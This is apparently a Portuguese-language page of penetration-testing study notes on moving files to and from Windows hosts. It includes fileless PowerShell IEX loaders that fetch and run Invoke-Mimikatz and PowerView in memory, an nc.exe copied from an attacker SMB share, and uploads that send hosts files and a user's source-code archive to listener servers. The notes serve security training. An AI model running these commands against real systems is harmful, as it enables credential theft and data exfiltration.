LinkedinTryHackme

Windows File Transfer Methods

Powershell

  • Download de um arquivo

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

  • PowerShell DownloadString - Método sem arquivo

Em vez de baixar um script do PowerShell para o disco, podemos executá-lo diretamente na memória usando o cmdlet Invoke-Expression ou o alias IEX

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

  • PowerShell Invoke-WebRequest

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

  • Ignorar erros comuns de download no IE

Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX

  • Outro erro nos downloads do PowerShell está relacionado ao canal seguro SSL/TLS se o certificado não for confiável. Podemos ignorar esse erro com o seguinte comando:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

SMB Downloads

  • Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

  • Copy a File from the SMB Server

copy \\192.168.220.133\share\nc.exe

  • Crie o servidor SMB com um nome de usuário e senha

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

  • Monte o servidor SMB com nome de usuário e senha

net use n: \\192.168.220.133\share /user:test test

FTP Downloads

  • Instalando o módulo Python3 do servidor FTP - pyftpdlib

sudo pip3 install pyftpdlib

  • Configurando um servidor FTP Python3

sudo python3 -m pyftpdlib --port 21

  • Transferindo arquivos de um servidor FTP usando o PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

PowerShell Web Uploads

  • Instalando um WebServer

pip3 install uploadserver

  • Configurando o Upload

python3 -m uploadserver

  • Script do PowerShell para carregar um arquivo no servidor de upload do Python

Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

  • Carregamento da Web do PowerShell Base64

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

  • Capturamos os dados base64 com o Netcat e usamos o aplicativo base64 com a opção decode para converter a string no arquivo.

nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts

SMB Uploads

  • Instalando módulos Python do WebDav

sudo pip3 install wsgidav cheroot

  • Usando o módulo Python WebDav

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

  • Conectando-se ao Webdav Share

dir \\192.168.49.128\DavWWWRoot

  • Carregando arquivos usando SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

FTP Uploads

sudo python3 -m pyftpdlib --port 21 --write

  • Arquivo de upload do PowerShell

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

PreviousFile TransfersNextQuestion

Last updated